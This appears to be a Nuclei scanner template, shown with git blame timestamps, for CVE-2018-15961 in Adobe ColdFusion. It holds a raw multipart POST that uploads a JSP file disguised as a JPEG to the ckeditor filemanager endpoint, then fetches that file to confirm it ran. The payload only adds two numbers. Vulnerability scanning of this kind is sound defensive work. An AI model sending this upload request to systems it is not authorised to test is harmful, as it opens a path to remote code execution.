nuclei-templates/cves/2018/CVE-2018-15961.yaml

45 lines
1.2 KiB
YAML
Raw Normal View History

2021-11-10 18:08:18 +00:00
id: CVE-2018-15961
2021-11-10 18:05:59 +00:00
info:
name: CVE-2018-15961
2021-11-10 17:51:54 +00:00
author: SkyLark-Lab,ImNightmaree
severity: critical
2021-11-11 06:21:24 +00:00
reference:
- https://github.com/vah13/CVE-2018-15961
- https://www.cvedetails.com/cve/CVE-2018-15961/
tags: adobe,cve,cve2018,rce,coldfusion,fileupload
2021-11-10 18:05:59 +00:00
2021-11-10 18:14:05 +00:00
requests:
- raw:
2021-11-10 18:14:05 +00:00
- |
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
2021-11-10 18:14:05 +00:00
-----------------------------24464570528145
2021-11-11 06:21:24 +00:00
Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp"
2021-11-10 18:14:05 +00:00
Content-Type: image/jpeg
2021-11-11 06:21:24 +00:00
<%int x,y;x=Integer.parseInt("9090873");y=Integer.parseInt("9097878");out.print(x+y);%>
2021-11-10 18:14:05 +00:00
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
2021-11-11 06:21:24 +00:00
{{randstr}}.jsp
2021-11-10 18:14:05 +00:00
-----------------------------24464570528145--
2021-11-11 06:21:24 +00:00
- method: GET
path:
- "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"
matchers-condition: and
matchers:
- type: word
2021-11-11 06:21:24 +00:00
part: body
words:
2021-11-11 06:21:24 +00:00
- "18188751"
- type: status
status:
- 200